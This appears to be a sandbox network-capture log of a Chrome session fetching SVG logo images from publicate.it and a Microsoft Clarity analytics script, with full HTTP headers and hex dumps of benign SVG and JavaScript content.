                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1161INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 34 2e 34 35 33 34 36 39 36 37 2c 35 30 2e 37 30 33 31 32 35 20 4c 31 34 2e 38 34 34 38 39 38 39 2c 35 30 2e 37 30 33 31 32 35 20 4c 31 34 2e 38 34 34 38 39 38 39 2c 32 34 2e 34 38 39 32 36 34 35 20 4c 30 2c 31 32 2e 39 32 34 33 32 36 20 4c 30 2c 34 36 2e 30 37 37 31 34 39 36 20 43 30 2c 34 38 2e 36 33 36 38 35 36 20 31 2e 39 39 36 36 33 38 39 2c 35 30 2e 37 30 33 31 32 35 20 34 2e 34 35 33 34 36 39 36 37 2c 35 30 2e 37 30 33 31 32 35 22 20 69 64 3d 22 50 61 74 68 22 20 66 69 6c 6c 3d 22 23 34 32 38 35 46 34 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 35 32 2e 34 35 31 39 37 36 31 2c 35 30 2e 37 30 33
                                                                                                                                                                                                        Data Ascii: <path d="M4.45346967,50.703125 L14.8448989,50.703125 L14.8448989,24.4892645 L0,12.924326 L0,46.0771496 C0,48.636856 1.9966389,50.703125 4.45346967,50.703125" id="Path" fill="#4285F4"></path> <path d="M52.4519761,50.703


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        117192.168.2.549902104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC706OUTGET /images/outlook_client.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC755INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:26 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 12820
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:04 GMT
                                                                                                                                                                                                        etag: "3214-620aa1d14adc0"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gh%2BMMm8W5SDf%2Brj8X12K9cG%2Bqwu7s7UKFjo7YP3aMqc3IRYMI0keqpNvRFGjhg0yygrp6he9VsIHleSJgUx7vM6PN%2Fr5ikfERqnnIHBeXM%2FOg0GLhWcavWlqRoOjlw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615d29f8543c3-EWR
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC614INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 31 33 36 70 78 22 20 68 65 69 67 68 74 3d 22 31 33 36 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 33 36 20 31 33 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 38 2e 39 37 38 32 36 30 38 37 2c 30 20 4c 31 30 39
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>1</title> <defs> <path d="M8.97826087,0 L109
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 65 72 2d 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 4d 6f 72 70 68 6f 6c 6f 67 79 20 72 61 64 69 75 73 3d 22 30 2e 35 22 20 6f 70 65 72 61 74 6f 72 3d 22 64 69 6c 61 74 65 22 20 69 6e 3d 22 53 6f 75 72 63 65 41 6c 70 68 61 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4d 6f 72 70 68 6f 6c 6f 67 79 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 4f 66 66 73 65 74 20 64 78 3d 22 30 22 20 64 79 3d 22 34 22 20 69 6e 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 4f 66 66 73 65 74 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4f 66 66 73 65 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 47 61 75 73 73 69 61 6e 42 6c 75 72 20 73 74
                                                                                                                                                                                                        Data Ascii: er-2"> <feMorphology radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology> <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset> <feGaussianBlur st
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 30 2c 20 2d 34 31 37 31 2e 30 30 30 30 30 30 29 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 45 6d 61 69 6c 2d 63 6c 69 65 6e 74 73 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 31 38 2e 30 30 30 30 30 30 2c 20 34 30 38 34 2e 30 30 30 30 30 30 29 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 31 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2e 30 30 30 30 30 30 2c 20 39 32 2e 30 30 30 30 30 30 29 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 52 65 63 74 61 6e 67 6c 65 2d 31 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 73 65 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 20
                                                                                                                                                                                                        Data Ascii: 0, -4171.000000)"> <g id="Email-clients" transform="translate(418.000000, 4084.000000)"> <g id="1" transform="translate(0.000000, 92.000000)"> <g id="Rectangle-12"> <use fill="black"
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 34 37 2e 32 35 32 39 35 38 35 20 34 32 2e 30 32 32 35 35 33 35 2c 34 37 2e 31 38 36 35 39 38 33 20 4c 36 34 2e 36 38 38 39 32 35 2c 33 33 2e 36 31 31 34 38 37 36 20 43 36 35 2e 31 34 31 37 32 32 32 2c 33 33 2e 33 34 34 33 38 34 31 20 36 35 2e 34 31 38 31 35 31 39 2c 33 32 2e 38 35 32 30 33 31 38 20 36 35 2e 34 31 33 30 34 33 35 2c 33 32 2e 33 32 31 36 39 32 32 20 5a 22 20 69 64 3d 22 50 61 74 68 22 20 66 69 6c 6c 3d 22 23 30 41 32 37 36 37 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 38 2e 35 39 32 34 38 31 39 2c 32 33 2e 32 35 37 37 37 35 32 20 4c 33 33 2e 34 36 37 30 39 36 31 2c 32 33 2e 32 35 37 37 37 35 32 20 4c 33 33 2e 34 36 37 30 39 36 31 2c 33 37 2e 30 35 32
                                                                                                                                                                                                        Data Ascii: 47.2529585 42.0225535,47.1865983 L64.688925,33.6114876 C65.1417222,33.3443841 65.4181519,32.8520318 65.4130435,32.3216922 Z" id="Path" fill="#0A2767"></path> <path d="M18.5924819,23.2577752 L33.4670961,23.2577752 L33.4670961,37.052
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 39 32 34 38 31 39 20 33 37 2e 30 35 32 39 36 36 32 20 33 33 2e 34 36 37 30 39 36 31 20 33 37 2e 30 35 32 39 36 36 32 20 33 33 2e 34 36 37 30 39 36 31 20 34 39 2e 35 39 33 37 38 32 38 20 31 38 2e 35 39 32 34 38 31 39 20 34 39 2e 35 39 33 37 38 32 38 22 3e 3c 2f 70 6f 6c 79 67 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 6f 6c 79 67 6f 6e 20 69 64 3d 22 50 61 74 68 22 20 66 69 6c 6c 3d 22 23 30 30 37 38 44 34 22 20 70 6f 69 6e 74 73 3d 22 34 38 2e 36 37 39 34 34 31 37 20 33 36 2e 39 33 39 30 37 36 38 20 36 32 2e 33 37 30 35 33 31 34 20 33 36 2e 39 33 39 30 37 36 38 20 36 32 2e 33 37 30 35 33 31 34 20 35 30 2e 37 39 31 32 33 30 35 20 34 38 2e 36 37 39 34 34 31 37 20 35 30 2e 37 39 31 32 33 30 35 22 3e 3c 2f 70 6f
                                                                                                                                                                                                        Data Ascii: 924819 37.0529662 33.4670961 37.0529662 33.4670961 49.5937828 18.5924819 49.5937828"></polygon> <polygon id="Path" fill="#0078D4" points="48.6794417 36.9390768 62.3705314 36.9390768 62.3705314 50.7912305 48.6794417 50.7912305"></po
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 33 32 2e 37 34 38 37 36 38 36 20 31 35 2e 39 35 30 38 39 36 34 2c 33 32 2e 37 34 31 38 36 35 31 20 31 35 2e 39 34 32 35 30 31 34 2c 33 32 2e 37 34 31 38 36 35 31 20 4c 31 35 2e 39 34 32 35 30 31 34 2c 33 32 2e 37 34 31 38 36 35 31 20 4c 31 33 2e 36 39 31 30 38 39 36 2c 33 31 2e 33 37 32 30 34 37 31 20 4c 31 33 2e 36 39 31 30 38 39 36 2c 33 30 2e 32 31 37 36 38 32 38 20 4c 31 34 2e 36 31 39 30 34 37 32 2c 33 30 2e 32 30 32 32 38 35 35 20 4c 31 36 2e 35 38 31 34 31 38 39 2c 33 31 2e 33 34 31 32 35 32 34 20 4c 31 36 2e 36 32 37 30 33 38 2c 33 31 2e 33 35 36 36 34 39 37 20 4c 31 36 2e 37 39 34 33 36 37 36 2c 33 31 2e 34 36 34 33 39 34 37 20 43 31 36 2e 37 39 34 33 36 37 36 2c 33 31 2e 34 36 34 33 39 34 37 20 33 39 2e 38 35 36 32 33 35 35 2c 34 34 2e 37 37 37
                                                                                                                                                                                                        Data Ascii: 32.7487686 15.9508964,32.7418651 15.9425014,32.7418651 L15.9425014,32.7418651 L13.6910896,31.3720471 L13.6910896,30.2176828 L14.6190472,30.2022855 L16.5814189,31.3412524 L16.627038,31.3566497 L16.7943676,31.4643947 C16.7943676,31.4643947 39.8562355,44.777
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 34 32 2e 33 35 31 31 30 34 2c 34 36 2e 32 35 30 37 39 36 33 20 4c 34 32 2e 30 31 31 38 37 32 32 2c 34 36 2e 34 34 33 31 39 30 34 20 43 34 31 2e 39 31 33 35 36 30 37 2c 34 36 2e 35 30 36 35 31 34 35 20 34 31 2e 38 31 31 39 39 38 33 2c 34 36 2e 35 36 34 35 39 37 38 20 34 31 2e 37 30 37 36 31 33 38 2c 34 36 2e 36 31 37 31 31 34 39 20 43 34 31 2e 33 33 33 38 37 33 2c 34 36 2e 38 30 32 37 31 33 38 20 34 30 2e 39 32 37 34 38 30 37 2c 34 36 2e 39 31 31 35 34 33 32 20 34 30 2e 35 31 31 39 34 33 32 2c 34 36 2e 39 33 37 32 34 31 35 20 4c 34 39 2e 31 33 35 38 31 31 34 2c 35 37 2e 32 35 35 35 36 39 20 4c 36 34 2e 31 37 39 32 39 31 33 2c 36 30 2e 39 32 33 33 30 38 35 20 43 36 34 2e 35 39 31 35 30
                                                                                                                                                                                                        Data Ascii: <path d="M42.351104,46.2507963 L42.0118722,46.4431904 C41.9135607,46.5065145 41.8119983,46.5645978 41.7076138,46.6171149 C41.333873,46.8027138 40.9274807,46.9115432 40.5119432,46.9372415 L49.1358114,57.255569 L64.1792913,60.9233085 C64.59150
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 2c 34 37 2e 39 36 33 38 37 33 31 20 43 33 36 2e 35 30 36 38 35 37 34 2c 34 39 2e 31 31 34 39 31 32 31 20 33 35 2e 38 31 35 31 30 34 36 2c 35 30 2e 31 34 39 35 33 31 35 20 33 34 2e 37 36 30 31 34 39 34 2c 35 30 2e 35 38 30 34 30 33 31 20 43 33 34 2e 34 33 33 33 34 39 34 2c 35 30 2e 37 32 32 34 38 34 38 20 33 34 2e 30 38 31 34 2c 35 30 2e 37 39 35 38 39 33 31 20 33 33 2e 37 32 35 36 39 39 36 2c 35 30 2e 37 39 35 38 39 33 31 20 4c 31 35 2e 32 31 32 33 30 39 39 2c 35 30 2e 37 39 35 38 39 33 31 20 4c 31 35 2e 32 31 32 33 30 39 39 2c 31 33 2e 38 35 32 31 35 33 38 20 4c 31 38 2e 32 35 34 37 38 36 32 2c 31 33 2e 38 35 32 31 35 33 38 20 4c 31 38 2e 32 35 34 37 38 36 32 2c 31 32 2e 33 31 33 30 33 37 36 20 4c 33 33 2e 37 32 35 37 33 35 33 2c 31 32 2e 33 31 33 30 33
                                                                                                                                                                                                        Data Ascii: ,47.9638731 C36.5068574,49.1149121 35.8151046,50.1495315 34.7601494,50.5804031 C34.4333494,50.7224848 34.0814,50.7958931 33.7256996,50.7958931 L15.2123099,50.7958931 L15.2123099,13.8521538 L18.2547862,13.8521538 L18.2547862,12.3130376 L33.7257353,12.31303
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 35 39 31 2c 34 39 2e 32 35 32 30 37 38 32 20 4c 31 35 2e 32 31 32 33 30 39 39 2c 34 39 2e 32 35 32 30 37 38 32 20 4c 31 35 2e 32 31 32 33 30 39 39 2c 31 33 2e 38 35 32 31 35 33 38 20 4c 33 30 2e 36 38 33 32 32 33 33 2c 31 33 2e 38 35 32 31 35 33 38 20 43 33 32 2e 32 32 31 35 35 35 33 2c 31 33 2e 38 35 32 39 38 35 31 20 33 33 2e 34 36 37 39 31 37 37 2c 31 35 2e 31 31 35 34 31 39 36 20 33 33 2e 34 36 37 30 39 36 31 2c 31 36 2e 36 37 31 38 34 38 37 20 43 33 33 2e 34 36 37 30 39 36 31 2c 31 36 2e 36 37 32 33 35 34 37 20 33 33 2e 34 36 37 30 39 36 31 2c 31 36 2e 36 37 32 38 36 30 37 20 33 33 2e 34 36 37 30 39 36 31 2c 31 36 2e 36 37 33 33 36 36 37 20 5a 22 20 69 64 3d 22 50 61 74 68 22 20 66 69 6c 6c 3d 22 23 30 30 30 30 30 30 22 20 6f 70 61 63 69 74 79 3d 22
                                                                                                                                                                                                        Data Ascii: 591,49.2520782 L15.2123099,49.2520782 L15.2123099,13.8521538 L30.6832233,13.8521538 C32.2215553,13.8529851 33.4679177,15.1154196 33.4670961,16.6718487 C33.4670961,16.6723547 33.4670961,16.6728607 33.4670961,16.6733667 Z" id="Path" fill="#000000" opacity="
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1254INData Raw: 33 39 38 37 20 39 2e 34 33 33 36 31 36 32 34 2c 33 37 2e 32 34 33 34 34 34 36 20 38 2e 37 33 31 38 39 36 35 34 2c 33 35 2e 38 32 36 32 34 31 39 20 43 37 2e 39 38 30 36 39 39 35 39 2c 33 34 2e 32 39 31 33 31 38 34 20 37 2e 36 30 34 31 30 30 38 35 2c 33 32 2e 35 39 36 36 30 32 37 20 37 2e 36 33 33 35 37 32 38 36 2c 33 30 2e 38 38 34 31 30 34 33 20 43 37 2e 36 30 32 32 37 38 39 34 2c 32 39 2e 30 39 30 37 35 31 38 20 37 2e 39 37 32 30 31 38 37 34 2c 32 37 2e 33 31 33 34 34 37 33 20 38 2e 37 31 35 31 34 32 31 35 2c 32 35 2e 36 38 34 39 38 33 34 20 5a 20 4d 31 32 2e 31 31 30 35 33 32 34 2c 33 34 2e 30 34 32 34 33 31 35 20 43 31 32 2e 34 37 36 39 34 39 39 2c 33 34 2e 39 37 38 39 39 32 35 20 31 33 2e 30 39 38 33 32 37 31 2c 33 35 2e 37 39 31 32 35 34 36 20 31 33
                                                                                                                                                                                                        Data Ascii: 3987 9.43361624,37.2434446 8.73189654,35.8262419 C7.98069959,34.2913184 7.60410085,32.5966027 7.63357286,30.8841043 C7.60227894,29.0907518 7.97201874,27.3134473 8.71514215,25.6849834 Z M12.1105324,34.0424315 C12.4769499,34.9789925 13.0983271,35.7912546 13


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        118192.168.2.54990313.107.246.454436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC426OUTGET /tag/kuemlmuzvn?ref=gtm2 HTTP/1.1
                                                                                                                                                                                                        Host: www.clarity.ms
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: CLID=c33b4f75fae844d6b05821f811173c55.20240830.20250830
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC379INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:26 GMT
                                                                                                                                                                                                        Content-Type: application/x-javascript
                                                                                                                                                                                                        Content-Length: 637
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                                        Request-Context: appId=cid-v1:b1d896b3-bec7-448b-b764-240152e813e8
                                                                                                                                                                                                        x-azure-ref: 20240830T161626Z-16579567576j7nvvu5n0ytgs1c00000003s000000000m9n0
                                                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC637INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 61 2c 72 2c 69 2c 74 2c 79 29 7b 66 75 6e 63 74 69 6f 6e 20 73 79 6e 63 28 29 7b 28 6e 65 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 2e 63 6c 61 72 69 74 79 2e 6d 73 2f 63 2e 67 69 66 22 7d 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3f 73 79 6e 63 28 29 3a 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 73 79 6e 63 29 3b 69 66 28 61 5b 63 5d 2e 76 7c 7c 61 5b 63 5d 2e 74 29 72 65 74 75 72 6e 20 61 5b 63 5d 28 22 65 76 65 6e 74 22 2c 63 2c 22 64 75 70 2e 22 2b 69 2e 70 72 6f 6a 65 63 74 49 64 29 3b 61 5b 63 5d 2e 74 3d 21 30 2c 28 74 3d 6c 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 72 29 29 2e
                                                                                                                                                                                                        Data Ascii: !function(c,l,a,r,i,t,y){function sync(){(new Image).src="https://c.clarity.ms/c.gif"}"complete"==document.readyState?sync():window.addEventListener("load",sync);if(a[c].v||a[c].t)return a[c]("event",c,"dup."+i.projectId);a[c].t=!0,(t=l.createElement(r)).


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        119192.168.2.549907104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC708OUTGET /images/mailchimp_client.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC761INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:26 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 43157
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:04 GMT
                                                                                                                                                                                                        etag: "a895-620aa1d13659f"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9hzysJAZ8VBm%2BkWFixnGwZpG%2F1%2FCq49GdpZ%2FxRUniUMGCMj3wU1sIRk8Nwcq%2B%2BNpY8%2FVsdrAkWKEY4WbZk9aPH7d2SuTS0M1fLDldBDKEcYzxCPWdND3MNn%2FNFeOCg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615d5e81942d3-EWR
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC608INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 31 33 36 70 78 22 20 68 65 69 67 68 74 3d 22 31 33 36 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 33 36 20 31 33 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 33 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 30 2e 33 32 35 2c 30 20 4c 31 30 37 2e 36 37 35
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>3</title> <defs> <path d="M10.325,0 L107.675
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 67 79 20 72 61 64 69 75 73 3d 22 30 2e 35 22 20 6f 70 65 72 61 74 6f 72 3d 22 64 69 6c 61 74 65 22 20 69 6e 3d 22 53 6f 75 72 63 65 41 6c 70 68 61 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4d 6f 72 70 68 6f 6c 6f 67 79 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 4f 66 66 73 65 74 20 64 78 3d 22 30 22 20 64 79 3d 22 34 22 20 69 6e 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 4f 66 66 73 65 74 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4f 66 66 73 65 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 47 61 75 73 73 69 61 6e 42 6c 75 72 20 73 74 64 44 65 76 69 61 74 69 6f 6e 3d 22 34 22 20 69 6e 3d 22 73 68 61 64 6f 77 4f 66 66 73 65
                                                                                                                                                                                                        Data Ascii: gy radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology> <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset> <feGaussianBlur stdDeviation="4" in="shadowOffse
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 67 41 41 41 41 49 41 43 41 59 41 41 41 44 30 65 4e 54 36 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 45 52 6c 57 45 6c 6d 54 55 30 41 4b 67 41 41 41 41 67 41 41 59 64 70 41 41 51 41 41 41 41 42 41 41 41 41 47 67 41 41 41 41 41 41 41 36 41 42 41 41 4d 41 41 41 41 42 41 41 45 41 41 4b 41 43 41 41 51 41 41 41 41 42 41 41 41 43 41 4b 41 44 41 41 51 41 41 41 41 42 41 41 41 43 41 41 41 41 41 41 41 4c 2b 4c 57 46 41 41 42 41 41 45 6c 45 51 56 52 34 41 65 78 39 42 62 68 64 78 66 55 39 46 6f 49 48 43 47 34 4a 67 65 41 75 78 55 6d 4b 74 37 67 56 43 67 57 4b 51 34 45 69 78 64 73 66 70 4a 51 57 57 6f 6f 58 64 36 65 55 6f 67 57 4b 42 79 76 75 72 67 6e 75 54 6e 44 34
